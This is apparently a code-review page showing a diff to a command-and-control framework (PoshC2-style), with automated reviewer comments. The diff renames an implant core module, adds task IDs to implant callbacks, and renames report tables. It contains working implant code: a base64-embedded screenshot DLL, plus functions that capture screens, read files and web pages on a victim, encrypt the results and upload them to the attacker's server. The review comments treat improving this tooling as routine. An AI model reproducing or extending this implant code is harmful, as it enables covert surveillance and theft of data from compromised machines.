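Review bot: The four added lines read the implant templates with `open(...).read()` and never close the file objects; use `with open("%s/PyImplant-Core.py" % FilesDirectory, 'r') as f:` / `py_implant_core = f.read()` and the same for the PS1 template. Moving the cores out of the source into files also widens what must be trusted at payload-generation time: anything that can write to FilesDirectory now injects into every implant this server generates, so those files deserve the same write protection as the server code itself. Both templates are still passed through `%` formatting, so any literal percent sign in them has to be written as `%%` (as the old inline templates did, e.g. `"%%s/%%s%%s" %% (...)`) or generation fails at this line; a one-line comment above the reads, `# Templates are %-formatted: literal '%' inside them must be escaped as '%%'.`, would save the next editor of those files from that surprise. The enclosing __init__ starts before this hunk.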
@@ -607,8 +101,8 @@ while($true)
 new_implant(self.RandomURI, self.User, self.Hostname, self.IPAddress, self.Key, self.FirstSeen, self.FirstSeen, self.PID, self.Proxy, self.Arch, self.Domain, self.Alive, self.Sleep, self.ModsLoaded, self.Pivot, self.Label)
 def autoruns(self):
- new_task("loadmodule Implant-Core.ps1", self.RandomURI)
- update_mods("Implant-Core.ps1", self.RandomURI)
+ new_task("loadmodule Core.ps1", self.RandomURI)
+ update_mods("Core.ps1", self.RandomURI)
 result = get_autoruns()
 if result:
 autoruns = ""
diff --git a/ImplantHandler.py b/ImplantHandler.py
index 7ffcc01..7007602 100644
--- a/ImplantHandler.py
+++ b/ImplantHandler.py
@@ -250,7 +250,7 @@ def startup(printhelp = ""):
 startup()
 if "output-to-html" in implant_id.lower():
- generate_table("CompletedTasks")
+ generate_table("Tasks")
 generate_table("C2Server")
 generate_table("Creds")
 generate_table("Implants")
@@ -307,7 +307,7 @@ def startup(printhelp = ""):
 startup("Updated set-defaultbeacon (Restart C2 Server): %s\r\n" % cmd)
 if "opsec" in implant_id.lower():
 implants = get_implants_all()
- comtasks = get_completedtasks()
+ comtasks = get_tasks()
 hosts = ""
 uploads = ""
 urls = ""
@@ -729,9 +729,9 @@ def runcommand(command, randomuri):
 else:
 try:
- check_module_loaded("Implant-Core.ps1", randomuri)
+ check_module_loaded("Core.ps1", randomuri)
 except Exception as e:
- print ("Error loading Implant-Core.ps1: %s" % e)
+ print ("Error loading Core.ps1: %s" % e)
 run_autoloads(command, randomuri)
diff --git a/Modules/Implant-Core.ps1 b/Modules/Core.ps1
similarity index 96%
rename from Modules/Implant-Core.ps1
rename to Modules/Core.ps1
index ad44efb..980878c 100644
--- a/Modules/Implant-Core.ps1
+++ b/Modules/Core.ps1
@@ -392,6 +392,10 @@ Function Get-Screenshot $psloadedscreen = $null function Get-ScreenshotAllWindows { + param( + [string] $TaskId + ) + if ($psloadedscreen -ne "TRUE") { $script:psloadedscreen = "TRUE" $ps = "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AQAAAgAmBgAgAAAAAAAAAQD1AAAAAgA3AAAAAwB8BQAAAQA+AQAAAQCfAAAAAQC5AAAAAgCgAwAAAQClBAAAAQB0AQAAAgBNBgAAAwDRBQAAAQDXAwAAAQDXAwAAAgC7AAAAAwCgAwAgAQBPAQAAAgB9BQAAAwBOBgAABADVBQAAAQB9BQAAAgBOBgAAAwDVBQAAAQClBAAAAQClBAAAAgC7AAAAAwCgAwAAAQDwAAAAAgCzBgAAAwB8BgAAAQD1AAAAAQDwAAIAAgDmAAAAAQAfBgAAAgD6AAAAAQDiAwAAAgCgAwAAAQDiAwAAAgCgAwAAAwBoAwAABAAfBgAAAQBqBgAAAQAfBgAAAgD6AAAAAQDLBAAAAgCgAwAAAQDLBAAAAgCgAwAAAwBoAwAABAAfBgAAAQBqBgAAAQAfBgAAAgD6AAAAAQDwAAAAAgCgAwAAAQDwAAAAAgCgAwAAAwBoAwAABAAfBgAAAQBqBgkA8AQBABEA8AQGABkA8AQKACkA8AQQADEA8AQQADkA8AQQAEEA8AQQAEkA8AQQAFEA8AQQAFkA8AQQAGEA8AQVAGkA8AQQAHEA8AQQAIkAQwMkAIkAOgYkAIkAKwYkAIkAgQQkAMEAbwQoAIkAHgc5AJEAmAU9AJEAIwVDAJEAggBDAIkA0QNIAIEA8ARXAMkAAQFdAMkArgBkAMkAowBoAHkA8AQGAAgABAB/AAgACACEAAgADACJAAkAEACOAC4ACwBnAS4AEwBwAS4AGwCPAS4AIwCYAS4AKwCoAS4AMwCoAS4AOwCo
AS4AQwCYAS4ASwCuAS4AUwCoAS4AWwCoAS4AYwDGAS4AawDwAUEAkwBhAJUAGgAuAFEAcQOGA3sDAQAAAQMAVgYBAAABBQBYBAEAAAEHABEAAQAAAQkALgABAAABCwD9BQEAAAENANkGAgAAAQ8AQQACAAABEQAkAAIAAAETABIGAQBAARsAzgYCAEABHQABBwIAAAEfADsAAgAAASEA7wUCAEABIwDqBgMAAAEnAP8EAgAAASkApwUCAAABKwAuBAIARgEtAAQEAgAAAS8A8QMCAEABMQC6BQIAQAEzAK4EAgBAATUAugQCAAABNwCYBAIAAAE5ANwFAgBAATsAFgQEAEABPQDABgIAAAE/ACEBAgAAAUEA1wACAASAAAABAAAAAAAAAAAAAAAAAIYGAAACAAAAAAAAAAAAAABtAJIAAAAAAAIAAAAAAAAAAAAAAHYANAMAAAAAAgAAAAAAAAAAAAAAbQCDBQAAAAADAAIABAACAAUAAgAGAAIAAAAAdXNlcjMyADxNb2R1bGU+AENyZWF0ZUNvbXBhdGlibGVEQwBSZWxlYXNlREMARGVsZXRlREMAaERDAEdldERDAEdldFdpbmRvd0RDAE1BWElNVU1fQUxMT1dFRABXSU5TVEFfQUxMX0FDQ0VTUwBDQVBUVVJFQkxUAFNSQ0NPUFkAZ2V0X1dvcmtpbmdBcmVhAG1zY29ybGliAGhEYwBhYmMAUmVsZWFzZUhkYwBHZXRIZGMAaGRjAGxwRW51bUZ1bmMAblhTcmMAbllTcmMAaGRjU3JjAEdldFdpbmRvd1RocmVhZFByb2Nlc3NJZABoV25kAGh3bmQAbWV0aG9kAEZyb21JbWFnZQBFbmRJbnZva2UAQmVnaW5JbnZva2UASXNXaW5kb3dWaXNpYmxlAFdpbmRvd0hhbmRsZQBoYW5kbGUAUmVjdGFuZ2xlAERlc2t0b3BOYW1lAGxwQ2xhc3NOYW1lAGxwV2luZG93TmFtZQBuYW1lAFZhbHVlVHlwZQBDYXB0dXJlAEVudW1XaW5kb3dTdGF0aW9uc0RlbGVnYXRlAEVudW1EZXNrdG9wc0RlbGVnYXRlAEVudW1EZXNrdG9wV2luZG93c0RlbGVnYXRlAE11bHRpY2FzdERlbGVnYXRlAEd1aWRBdHRyaWJ1dGUARGVidWdnYWJsZUF0dHJpYnV0ZQBDb21WaXNpYmxlQXR0cmlidXRlAEFzc2VtYmx5VGl0bGVBdHRyaWJ1dGUAQXNzZW1ibHlUcmFkZW1hcmtBdHRyaWJ1dGUAQXNzZW1ibHlGaWxlVmVyc2lvbkF0dHJpYnV0ZQBBc3NlbWJseUNvbmZpZ3VyYXRpb25BdHRyaWJ1dGUAQXNzZW1ibHlEZXNjcmlwdGlvbkF0dHJpYnV0ZQBDb21waWxhdGlvblJlbGF4YXRpb25zQXR0cmlidXRlAEFzc2VtYmx5UHJvZHVjdEF0dHJpYnV0ZQBBc3NlbWJseUNvcHlyaWdodEF0dHJpYnV0ZQBBc3NlbWJseUNvbXBhbnlBdHRyaWJ1dGUAUnVudGltZUNvbXBhdGliaWxpdHlBdHRyaWJ1dGUAU3lzdGVtLkRyYXdpbmcAZ2V0X1dpZHRoAG5XaWR0aAB3aWR0aABBc3luY0NhbGxiYWNrAGNhbGxiYWNrAGdkaTMyLmRsbABVc2VyMzIuZGxsAHVzZXIzMi5kbGwAU2NyZWVuc2hvdC5kbGwAbFBhcmFtAFN5c3RlbQBCb3R0b20AU2NyZWVuAENhcHR1cmVSZWdpb24AcmVnaW9uAFVuaW9uAHdpblN0YXRpb24Ad2luZG93c1N0YXRpb24AQ2xvc2VXaW5kb3dTdGF0aW9uAE9wZW5XaW5kb3dTdGF0aW9uAEdldFByb2Nlc3NXaW5kb3dTdGF0aW9uAFNldFByb2Nlc3NXaW5kb3dTdGF0aW9uAFN5c3RlbS5SZWZsZWN0aW9uAENyZWF0
ZUNvbXBhdGlibGVCaXRtYXAARnJvbUhiaXRtYXAAZHdSb3AAZ2V0X1RvcABDYXB0dXJlRGVza3RvcABDbG9zZURlc2t0b3AAaERlc2t0b3AAT3BlbkRlc2t0b3AAT3BlbklucHV0RGVza3RvcABkZXNrdG9wAFN0cmluZ0J1aWxkZXIAaHduZENoaWxkQWZ0ZXIALmN0b3IAR3JhcGhpY3MAR2V0U3lzdGVtTWV0cmljcwBTeXN0ZW0uRGlhZ25vc3RpY3MAZ2V0X0JvdW5kcwBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBEZWJ1Z2dpbmdNb2RlcwBuRmxhZ3MAU3lzdGVtLldpbmRvd3MuRm9ybXMAZ2V0X0FsbFNjcmVlbnMARW51bVdpbmRvd1N0YXRpb25zAEVudW1EZXNrdG9wcwBscHN6Q2xhc3MAbmVlZEFjY2VzcwBFbnVtRGVza3RvcFdpbmRvd3MAR2V0V2luZG93UmVjdABEZWxldGVPYmplY3QAaE9iamVjdABTZWxlY3RPYmplY3QAb2JqZWN0AHJlY3QAZ2V0X0xlZnQAUmlnaHQAZ2V0X0hlaWdodABuSGVpZ2h0AGZJbmhlcml0AEJpdEJsdABJQXN5bmNSZXN1bHQAcmVzdWx0AGh3bmRQYXJlbnQAbk1heENvdW50AFNjcmVlbnNob3QAaGRjRGVzdABueERlc3QAbnlEZXN0AFN5c3RlbS5UZXh0AGxwV2luZG93VGV4dABHZXRXaW5kb3dUZXh0AEZpbmRXaW5kb3cAR2V0RGVza3RvcFdpbmRvdwBQcmludFdpbmRvdwBscHN6V2luZG93AEZpbmRXaW5kb3dFeAB3b3JraW5nQXJlYU9ubHkARW1wdHkAAAAAAMgUTmDMAYJGtc9up0YeCB0ABCABAQgDIAABBSABARERBCABAQ4EIAEBAgkHBhgYGBgYEkEDIAAIBQABEkEYCgcEEUUdEkkIEkkDBhFFBQAAHRJJBCAAEUUIAAIRRRFFEUUFBwIRDBgFIAIBCAgGAAESZRJhAyAAGAQgAQEYCLd6XFYZNOCJCLA/X38R1Qo6BCAAzAAEAAAAQAQAAAACBH8DAAABAgEWAgYIAgYJDAAJAhgICAgIGAgI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" @@ -409,11 +413,10 @@ function Get-ScreenshotAllWindows { $bitmap.save($msimage, "bmp") $b64 = [Convert]::ToBase64String($msimage.toarray()) $bitmap.Dispose(); - $ReadCommand = "get-screenshot" - $ReadCommand = Encrypt-String $key $ReadCommand + $eid = Encrypt-String $key $TaskId $send = Encrypt-String2 $key $b64 $UploadBytes = getimgdata $send - (Get-Webclient -Cookie $ReadCommand).UploadData("$Server", $UploadBytes)|out-null + (Get-Webclient -Cookie $eid).UploadData("$Server", $UploadBytes)|out-null } catch {} } $error.clear() @@ -446,7 +449,8 @@ function Download-File { param ( - [string] $Source + [string] $Source, + [string] $TaskId ) try { $fileName = Resolve-PathSafe $Source 
@@ -475,20 +479,18 @@ function Download-File
 $preNumbers = ($ChunkedByte+$totalChunkByte)
 $readSize = $bufferSize;
 $chunkBytes = $str.ReadBytes($readSize);
- $ReadCommand = "download-file "+$fullNewname
- $ReadCommand = Encrypt-String $key $ReadCommand
+ $eid = Encrypt-String $key $TaskId
 $send = Encrypt-Bytes $key ($preNumbers+$chunkBytes)
 $UploadBytes = getimgdata $send
- (Get-Webclient -Cookie $ReadCommand).UploadData("$Server", $UploadBytes)|out-null
+ (Get-Webclient -Cookie $eid).UploadData("$Server", $UploadBytes)|out-null
 ++$Chunk
 } until (($size -= $bufferSize) -le 0);
 } catch {
- $Output = "ErrorCmd: " + $error[0]
- $ReadCommand = "Error downloading file "+$fullnewname
- $ReadCommand = Encrypt-String $key $ReadCommand
+ $Output = "ErrorDownload: " + $error[0]
+ $eid = Encrypt-String $key $TaskId
 $send = Encrypt-String2 $key $output
 $UploadBytes = getimgdata $send
- (Get-Webclient -Cookie $ReadCommand).UploadData("$Server", $UploadBytes)|out-null
+ (Get-Webclient -Cookie $eid).UploadData("$Server", $UploadBytes)|out-null
 }
 }
 function Posh-Delete
@@ -755,15 +757,17 @@ try {
 }
 }
 Function Get-Webpage {
- param ($url)
+ param (
+ [string] $url,
+ [string] $TaskId
+ )
 $file = (New-Object System.Net.Webclient).DownloadString($url)|Out-String
- $ReadCommand = "download-file web.html"
- $ReadCommand = Encrypt-String $key $ReadCommand
+ $eid = Encrypt-String $key $TaskId
 $bytes = [System.Text.Encoding]::UTF8.GetBytes($file)
 $base64 = [Convert]::ToBase64String($bytes)
 $Output = Encrypt-String2 $key $base64
 $UploadBytes = getimgdata $Output
- (Get-Webclient -Cookie $ReadCommand).UploadData("$Server", $UploadBytes)|out-null
+ (Get-Webclient -Cookie $eid).UploadData("$Server", $UploadBytes)|out-null
 }
 Function AutoMigrate {
 if (($p = Get-Process | ? {$_.id -eq $pid}).name -eq "powershell") {
diff --git a/OfflineReportGenerator.py b/OfflineReportGenerator.py
index 5a2351e..07b9e08 100644
--- a/OfflineReportGenerator.py
+++ b/OfflineReportGenerator.py
@@ -204,7 +204,7 @@ function SearchTask() {
 function tweakMarkup(){
 // Add classes to columns
- var classes = ['id', 'Label', taskid', 'randomuri', 'command', 'output', 'prompt','ImplantID','RandomURI','User','Hostname','IpAddress','Key','FirstSeen','LastSeen','PID','Proxy','Arch','Domain','Alive','Sleep','ModsLoaded','Pivot']
+ var classes = ['id', 'Label', taskid', 'randomuri', 'command', 'output', 'user','ImplantID','RandomURI','User','Hostname','IpAddress','Key','FirstSeen','LastSeen','PID','Proxy','Arch','Domain','Alive','Sleep','ModsLoaded','Pivot']
 tbl = document.getElementById("PoshTable");
 ths = tbl.getElementsByTagName("th");
 for( i=0; i'; td.onclick = toggleHide
@@ -327,7 +327,7 @@ table {
 table tr th.randomuri {
 width: 15%;
 }
- table tr th.prompt {
+ table tr th.user {
 width: 10%;
 }
@@ -349,7 +349,7 @@ __________ .__. _________ ________
 """
- if table == "CompletedTasks":
+ if table == "Tasks":
 HTMLPre += """
@@ -366,13 +366,13 @@ __________ .__. _________ ________
 frame = pd.read_sql_query("SELECT * FROM %s" % table, conn)
 # encode the Output column
- if table == "CompletedTasks":
+ if table == "Tasks":
 for index, row in frame.iterrows():
 frame.loc[index, "Command"] = replace_tabs(cgi.escape(row["Command"]))
 frame.loc[index, "Output"] = replace_tabs(cgi.escape(row["Output"]))
 # convert the random uri to original hostname
- if table == "CompletedTasks":
+ if table == "Tasks":
 framelen = frame['RandomURI'].count()
 for x in range(0, framelen):
 try:
@@ -398,7 +398,7 @@ __________ .__. _________ ________
 HTMLPost = HTMLPost.replace("RandomURI","RandomURI")
 HTMLPost = HTMLPost.replace("Command","Command")
 HTMLPost = HTMLPost.replace("Output","Output")
- HTMLPost = HTMLPost.replace("Prompt","Prompt")
+ HTMLPost = HTMLPost.replace("User","User")
 HTMLPost = HTMLPost.replace("ImplantID","ImplantID")
 HTMLPost = HTMLPost.replace("User","User")
 HTMLPost = HTMLPost.replace("Hostname","Hostname")
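Review bot: The rewritten `var classes = [...]` line in the `@@ -204,7 +204,7 @@` hunk of OfflineReportGenerator.py still carries the pre-existing `taskid'` with no opening quote, so the emitted JavaScript array literal is a syntax error and tweakMarkup() cannot run — the new `user` class it is meant to assign (matching the `th.user` rule added in the `@@ -327` hunk) never reaches the table. Since the line is being touched anyway, repair the literal: `var classes = ['id', 'Label', 'taskid', 'randomuri', 'command', 'output', 'user', ...]`. The rest of this hunk looks tag-stripped in the rendering, so the surrounding loop cannot be checked from here.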
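Review bot: The new `HTMLPost = HTMLPost.replace("User","User")` line in the `@@ -398,7 +398,7 @@` hunk renders identically to the existing `replace("User","User")` two lines below it. Every call in this hunk appears to replace a string with itself, so the page has most likely lost markup inside the literals; if the two lines really are the same call once the markup is restored, one of them is redundant. Worth confirming against the real source, and a short comment on the new line such as `# tasks table: the former Prompt column is now User` would make the intent clear given that the implants table already has a User column handled below.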
@@ -422,7 +422,7 @@ tweakMarkup();
 output_file.close()
 print reportname
-generate_table("CompletedTasks")
+generate_table("Tasks")
 generate_table("C2Server")
 generate_table("Creds")
 generate_table("Implants")
diff --git a/Tasks.py b/Tasks.py
index 8749a4e..a5850ad 100644
--- a/Tasks.py
+++ b/Tasks.py
@@ -15,6 +15,7 @@ def newTask(path):
 if RandomURI in path and tasks:
 for a in tasks:
 command = a[2]
+ user_command = command
 hostinfo = DB.get_hostinfo(RandomURI)
 now = datetime.datetime.now()
 print Colours.YELLOW,""
@@ -47,11 +48,17 @@ def newTask(path):
 except Exception as e:
 print "Cannot find module, loadmodule is case sensitive!"
 print e
+ taskId = DB.insert_task(RandomURI, user_command, None)
+ if len(str(taskId)) > 5:
+ raise ValueError('Task ID is greater than 5 characters which is not supported.')
+ taskIdStr = "0" * (5 - len(str(taskId))) + str(taskId)
+ command = taskIdStr + command
 if commands:
 commands += "!d-3dion@LD!-d" + command
 else:
 commands += command
 DB.del_newtasks(str(a[0]))
+ if commands is not None:
 multicmd = "multicmd%s" % commands
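Review bot: The added `user_command = command` in the `@@ -15,6 +15,7 @@` hunk of Tasks.py carries no comment saying why the copy exists; the reason only appears some thirty lines later in the `@@ -47` hunk, where `DB.insert_task(RandomURI, user_command, None)` stores the copy while `command` itself is rewritten with a task-id prefix. Suggest `user_command = command  # unmodified copy for the task record; command is prefixed with the task id below`. The enclosing `for a in tasks:` loop continues past the end of the hunk.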